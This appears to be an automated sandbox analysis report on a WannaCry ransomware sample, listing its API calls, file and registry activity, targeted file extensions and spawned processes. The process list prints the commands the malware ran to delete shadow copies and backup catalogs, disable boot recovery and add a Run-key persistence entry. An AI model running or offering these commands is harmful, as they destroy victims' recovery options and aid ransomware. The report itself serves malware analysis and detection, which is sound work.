Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exe | Code function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exe | Code function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Enumerates the file system
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\~SD874A.tmp
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Directory queried: number of queries: 1017

System Summary:

Executable creates window controls seldom found in malware
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Window found: window name: RICHEDIT
Uses Rich Edit Controls
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | File opened: C:\Windows\system32\RICHED32.DLL
Submission file is bigger than most known malware samples
Source: mssecsvc.exe | Static file information: File size 3723264 > 1048576
PE file has a big raw section
Source: mssecsvc.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
Binary contains paths to development resources
Source: tasksche.exe, mssecsvc.exe | Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: tasksche.exe | Binary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\Ap
Source: @WanaDecryptor@.exe | Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Classification label
Source: classification engine | Classification label: mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 21_2_00401398 Sleep,AdjustTokenPrivileges,21_2_00401398
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 38_1_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,38_1_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 38_1_00401398 Sleep,AdjustTokenPrivileges,38_1_00401398
Contains functionality to check free disk space
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10005540 GetDriveTypeW,InterlockedExchangeAdd,GetDiskFreeSpaceExW,Sleep,GetDiskFreeSpaceExW,Sleep,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,InterlockedExchange,GetDriveTypeW,5_2_10005540
Contains functionality to create services
Source: C:\mssecsvc.exe | Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
Source: C:\Windows\tasksche.exe | Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,3_2_00401CE8
Contains functionality to load and extract PE file embedded resources
Source: C:\mssecsvc.exe | Code function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
Contains functionality to modify services (start/stop/modify)
Source: C:\mssecsvc.exe | Code function: 0_2_00407FA0 ChangeServiceConfig2A,0_2_00407FA0
Contains functionality to register a service control handler (likely the sample is a service DLL)
Source: C:\mssecsvc.exe | Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates files inside the program directory
Source: C:\Windows\tasksche.exe | File created: C:\ProgramData\ywepvofkuzu108
Creates files inside the user directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\Desktop\~SD8694.tmp
Creates temporary files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\RAC\Temp\~SD887B.tmp
Executes batch files
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Executes Visual Basic scripts
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Found command line output
Source: C:\Windows\System32\icacls.exe | Console Write: ....................a..v..0.............................................+'...2"........v.....@..........x...............
Source: C:\Windows\System32\cmd.exe | Console Write: ........l#..........T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d...........+........v..+.B...`...........
Source: C:\Windows\System32\reg.exe | Console Write: ........a..v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........#.N...p.........#.
Source: C:\Windows\System32\vssadmin.exe | Console Write: ............`.......................a..v..0.....4...@...D....W..............................................S<..........
Source: C:\Windows\System32\vssadmin.exe | Console Write: ..............H.....N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y...........P...S<..........
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N.........Bw.dBw
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........@...N.........Bw.dBw
Source: C:\Windows\System32\wbadmin.exe | Console Write: ........PYBw..........%...%.O..............................v.....'.@p.%.........W.5u.....'.@p.%.........................
Source: C:\Windows\System32\wbadmin.exe | Console Write: ........PYBwh.......Bo&.@o&.4.......h......................v.....(.@..&.....h...W.5u.....(.@..&.t.......f...............
PE file has an executable .text section and no other executable section
Source: mssecsvc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | File read: C:\Windows\win.ini
Reads software policies
Source: C:\mssecsvc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\mssecsvc.exe 'C:\mssecsvc.exe'
Source: unknown | Process created: C:\mssecsvc.exe C:\mssecsvc.exe -m security
Source: unknown | Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe'
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: unknown | Process created: C:\Windows\System32\attrib.exe attrib +h .
Source: unknown | Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: unknown | Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknown | Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknown | Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknown | Process created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: C:\mssecsvc.exe | Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\Windows\System32\attrib.exe attrib +h .
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\mssecsvc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Contains functionality to launch a process as a different user
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the system directory
Source: C:\mssecsvc.exe | File created: C:\WINDOWS\tasksche.exe
Creates mutexes
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Mutant created: \BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Mutant created: \BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Deletes Windows files
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus
Enables security privileges
Source: C:\Windows\System32\wbengine.exe | Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: String function: 00316562 appears 35 times
PE file contains executable resources (Code or Archives)
Source: mssecsvc.exe | Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.3048.dr | Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Source: tasksche.exe.3216.dr | Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Reads the hosts file
Source: C:\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
